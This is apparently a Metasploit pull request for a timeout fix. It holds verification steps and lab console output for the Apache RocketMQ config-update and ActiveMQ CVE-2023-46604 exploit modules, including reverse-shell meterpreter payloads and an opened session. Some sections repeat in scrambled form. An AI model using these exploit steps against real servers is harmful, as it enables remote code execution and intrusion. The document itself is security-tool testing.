Do: use exploit/multi/http/apache_rocketmq_update_config.
Set the RHOST and LHOST options.
Run the module.
Receive a session in the context of the user running the RocketMQ application.
ActiveMQ
Steps (Linux target):
Start msfconsole
use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
set RHOST <LINUX_TARGET_IP>
set SRVHOST eth0
set target 1
set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
check
exploit
Ensure neither module hangs, times out or errors in any unexpected way (they shouldn't).
Testing
RocketMQ
msf6 exploit(multi/http/apache_rocketmq_update_config) > options
Module options (exploit/multi/http/apache_rocketmq_update_config):
Name Current Setting Required Description
---- --------------- -------- -----------
BROKER_PORT 10911 no The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommen
ded)
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 9876 yes The RocketMQ NameServer port (TCP)
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME ezCLiIlwE no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4434 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/apache_rocketmq_update_config) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4434
[*] 127.0.0.1:9876 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:9876 - The target appears to be vulnerable. RocketMQ version: 4.9.4
[*] 127.0.0.1:9876 - autodetection failed, assuming default port of 10911
[*] 127.0.0.1:9876 - Executing target: Automatic (Unix In-Memory) with payload cmd/linux/http/x64/meterpreter/reverse_tcp on Broker port: 10911
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] 127.0.0.1:9876 - Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted
[+] 127.0.0.1:9876 - Determined the original $ROCKETMQ_HOME: /home/rocketmq/rocketmq-4.9.4
[*] 127.0.0.1:9876 - Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value
[*] Meterpreter session 11 opened (172.16.199.1:4434 -> 172.16.199.1:59206) at 2024-04-26 14:09:31 -0700
meterpreter > getuid
Server username: rocketmq
meterpreter > sysinfo
Computer : 172.17.0.3
OS : CentOS 7.9.2009 (Linux 6.6.22-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
[*] Shutting down session: 11
[*] 127.0.0.1 - Meterpreter session 11 closed. Reason: User exit
ActiveMQ
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > options
Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 61616 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Unix
View the full module info with the info, or info -d command.
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 127.0.0.1:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.6
Fixes a timeout issue that was being seen when running the following modules:
Once this PR is landed we should be able to close https://github.com/rapid7/metasploit-framework/pull/19037 & https://github.com/rapid7/metasploit-framework/pull/19038
Verification
RocketMQ
use exploit/multi/http/apache_rocketmq_update_config
.RHOST
andLHOST
options.ActiveMQ
Steps (Linux target):
use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
set RHOST <LINUX_TARGET_IP>
set SRVHOST eth0
set target 1
set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
check
exploit
Ensure neither module hangs, times out or errors in any unexpected way (they shouldn't).
Testing
RocketMQ
ActiveMQ